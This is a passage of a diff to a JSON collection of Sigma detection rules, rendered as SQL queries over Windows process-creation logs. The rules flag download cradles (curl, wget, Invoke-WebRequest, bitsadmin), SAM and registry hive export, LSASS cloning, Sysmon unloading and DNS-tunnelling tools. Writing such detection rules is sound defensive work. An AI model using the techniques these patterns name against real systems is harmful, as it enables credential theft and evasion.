(update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", @@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + 